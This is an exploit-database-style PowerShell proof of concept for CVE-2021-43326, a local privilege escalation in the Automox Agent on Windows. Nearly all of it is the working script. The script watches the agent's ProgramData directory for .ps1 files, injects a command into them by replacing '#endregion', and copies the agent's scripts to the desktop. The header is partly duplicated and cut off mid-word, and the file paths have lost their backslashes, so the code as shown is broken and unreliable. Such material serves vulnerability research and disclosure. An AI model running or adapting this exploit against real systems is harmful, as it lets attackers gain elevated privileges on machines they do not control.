# Date: 13/12/2021
# Exploit Author: Greg Foss
# Writeup: https://www.lacework.com/blog/cve-2021-43326/
# Vendor Home # Exploit Title: Automox Agent 32 - Local Privilege Escalation
# Date: 13/12/2021
# Exploit Author: Greg Foss
# Writeup: https://www.lacework.com/blog/cve-2021-43326/
# Vendor Homepage: https://www.automox.com/
# Software Link: https://support.automox.com/help/agents
# Version: 31, 32, 33
# Tested on: Windows 10
# Language: PowerShell
# CVE: CVE-2021-43326
New-Item -ItemType Directory -Force -Path $HOMEDesktopautomox
$payload = "whoami >> $HOMEDesktopautomoxwho.txt"
echo ""
echo "Watching for Automox agent interaction..."
echo ""
for (($i = 0); $i -lt 500; $i++) {
if (Test-Path -Path ProgramDataamagentexecDir**.ps1) {
try {
$dir = Get-ChildItem ProgramDataamagentexecDir* | Select-Object Name
$dir = $dir.name
$file = Get-ChildItem ProgramDataamagent$dir*.ps1 | Select-Object Name
$file = $file.name
(Get-Content -Path ProgramDataamagent$dir$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path ProgramDataamagent$dir$file
cp -r ProgramDataamagent$dir $HOMEDesktopautomox
echo 'popped :-)'
Start-Sleep 5
echo ''
echo 'cloning all powershell script content...'
for (($i = 0); $i -lt 100; $i++) {
cp -r ProgramDataamagent* $HOMEDesktopautomox -Force
Start-Sleep 1
}
exit
} catch {
throw $_.Exception.Message
}
} else {
echo $i
Start-Sleep 1
}
}